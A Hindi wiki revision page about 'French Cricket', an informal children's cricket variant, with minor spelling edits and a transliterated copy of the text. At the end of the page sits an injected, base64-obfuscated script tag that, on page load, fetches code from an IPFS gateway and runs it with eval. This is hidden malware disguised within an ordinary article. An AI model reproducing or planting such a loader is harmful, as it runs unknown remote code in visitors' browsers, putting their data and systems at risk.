Difference between revisions of "फ़्रेंच क्रिकेट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " खास" to " ख़ास")
m (Text replacement - "अर्थात " to "अर्थात् ")
 
Line 1: Line 1:
 
[[चित्र:French-Cricket.jpg|thumb|250px|फ़्रेंच क्रिकेट]]
 
[[चित्र:French-Cricket.jpg|thumb|250px|फ़्रेंच क्रिकेट]]
 
'''फ़्रेंच क्रिकेट''' बच्चों के बीच खेला जाने वाला एक अनौपचारिक किस्म का [[क्रिकेट]] है।  इसमें कोई निर्धारित ओवर नहीं होते। इसमें एक बच्चा तब तक [[बल्लेबाज़ी]] करता है जब तक कि वह आउट नहीं हो जाता। [[बल्लेबाज़]] के आउट होने के बाद क्षेत्ररक्षण या [[गेंदबाज़ी]] कर रहा बच्चा (खिलाड़ी) बल्लेबाज़ी करता है। और समय खत्म होने तक यही क्रम चलता रहता है।
 
'''फ़्रेंच क्रिकेट''' बच्चों के बीच खेला जाने वाला एक अनौपचारिक किस्म का [[क्रिकेट]] है।  इसमें कोई निर्धारित ओवर नहीं होते। इसमें एक बच्चा तब तक [[बल्लेबाज़ी]] करता है जब तक कि वह आउट नहीं हो जाता। [[बल्लेबाज़]] के आउट होने के बाद क्षेत्ररक्षण या [[गेंदबाज़ी]] कर रहा बच्चा (खिलाड़ी) बल्लेबाज़ी करता है। और समय खत्म होने तक यही क्रम चलता रहता है।
* फ़्रेंच क्रिकेट में बल्लेबाज़ के आउट होने के दो ही तरीक़े होते हैं। पहला कैच आउट और दूसरा एल.बी.डब्ल्यू (लैग बिफोर विकेट अर्थात विकेट के सामने पैर आ जाना)। लेकिन इस प्रारूप में विकेट (स्टम्प्स) नहीं होते हैं।   
+
* फ़्रेंच क्रिकेट में बल्लेबाज़ के आउट होने के दो ही तरीक़े होते हैं। पहला कैच आउट और दूसरा एल.बी.डब्ल्यू (लैग बिफोर विकेट अर्थात् विकेट के सामने पैर आ जाना)। लेकिन इस प्रारूप में विकेट (स्टम्प्स) नहीं होते हैं।   
 
* क्रिकेट के इस प्रारूप में बल्लेबाज़ के यदि घुटनों से नीचे गेंद लगती है तो वह आउट माना जाता है। इसलिये बल्लेबाज़ को अपने पैरों की रक्षा विकेट की तरह ही करनी पड़ती है।  
 
* क्रिकेट के इस प्रारूप में बल्लेबाज़ के यदि घुटनों से नीचे गेंद लगती है तो वह आउट माना जाता है। इसलिये बल्लेबाज़ को अपने पैरों की रक्षा विकेट की तरह ही करनी पड़ती है।  
 
* इसी प्रारूप से मिलता-जुलता एक और क्रिकेट का रूप गली-मौहल्लों में बच्चों के बीच ख़ासा लोकप्रिय है। इसमें हर बच्चे को तय ओवर तक बल्लेबाज़ी कराई जाती है।  
 
* इसी प्रारूप से मिलता-जुलता एक और क्रिकेट का रूप गली-मौहल्लों में बच्चों के बीच ख़ासा लोकप्रिय है। इसमें हर बच्चे को तय ओवर तक बल्लेबाज़ी कराई जाती है।  

Latest revision as of 07:51, 7 November 2017

thumb|250px|freanch kriket freanch kriket bachchoan ke bich khela jane vala ek anaupacharik kism ka kriket hai. isamean koee nirdharit ovar nahian hote. isamean ek bachcha tab tak ballebazi karata hai jab tak ki vah aut nahian ho jata. ballebaz ke aut hone ke bad kshetrarakshan ya geandabazi kar raha bachcha (khila di) ballebazi karata hai. aur samay khatm hone tak yahi kram chalata rahata hai.

  • freanch kriket mean ballebaz ke aut hone ke do hi tariqe hote haian. pahala kaich aut aur doosara el.bi.dablyoo (laig biphor viket arthath viket ke samane pair a jana). lekin is praroop mean viket (stamps) nahian hote haian.
  • kriket ke is praroop mean ballebaz ke yadi ghutanoan se niche geand lagati hai to vah aut mana jata hai. isaliye ballebaz ko apane pairoan ki raksha viket ki tarah hi karani p dati hai.
  • isi praroop se milata-julata ek aur kriket ka roop gali-mauhalloan mean bachchoan ke bich khasa lokapriy hai. isamean har bachche ko tay ovar tak ballebazi karaee jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>